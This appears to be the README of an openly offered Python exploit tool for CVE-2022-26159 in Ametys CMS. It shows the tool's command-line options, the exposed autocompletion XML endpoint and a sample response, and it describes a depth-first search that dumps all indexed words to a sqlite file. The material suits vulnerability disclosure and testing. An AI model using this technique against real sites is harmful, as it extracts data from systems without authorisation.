A python exploit to automatically dump all the data stored by the auto-completion plugin of Ametys CMS to a local sqlite database file.
- Automatic detection of maximum results returned by the autocompletion plugin.
- Depth first search to dump all the results.
- Output log file.
$ ./CVE-2022-26159-Ametys-Autocompletion-XML.py -h
CVE-2022-26159-Ametys-Autocompletion-XML v1.1 - by @podalirius
usage: CVE-2022-26159-Ametys-Autocompletion-XML.py [-h] -t TARGET [-H HEADERS] [-k] [-v | -q] [--no-colors]
Description message
optional arguments:
-h, --help show this help message and exit
-t TARGET, --target TARGET
arg1 help message
-H HEADERS, --header HEADERS
Specify HTTP headers to use in requests. (e.g., --header "Header1: Value1" --header "Header2: Value2")
-k, --insecure Disable SSL/TLS warnings and certificate verification.
-v, --verbose Verbose mode. (default: False)
-q, --quiet Quiet mode. (default: False)
--no-colors Disables colored output. (default: False)
The autocompletion plugin in Ametys CMS <= 4.4.9 exposes publicly an XML file containing a wordlist at the following address:
https://domain.tld/plugins/web/service/search/auto-completion/domain/en.xml
To perform a request on this database, an attacker just needs to type the start of the word in the q
(query) parameter:
https://domain.tld/plugins/web/service/search/auto-completion/domain/en.xml?q=adm
And the auto-completion plugin returns the first 10 matching words starting with adm
(from the query) in an XML file:
<?xml version="1.0" encoding="UTF-8"?>
<auto-completion>
<item>administrateur</item>
<item>administrateurs</item>
<item>administratif</item>
<item>administratifs</item>
<item>administration</item>
<item>administrations</item>
<item>administrative</item>
<item>administratives</item>
<item>administres</item>
<item>admission</item>
</auto-completion>
With this in mind, an attacker just needs to perform a depth first search on the API to extract all the content of it.
Pull requests are welcome. Feel free to open an issue if you want to add other features.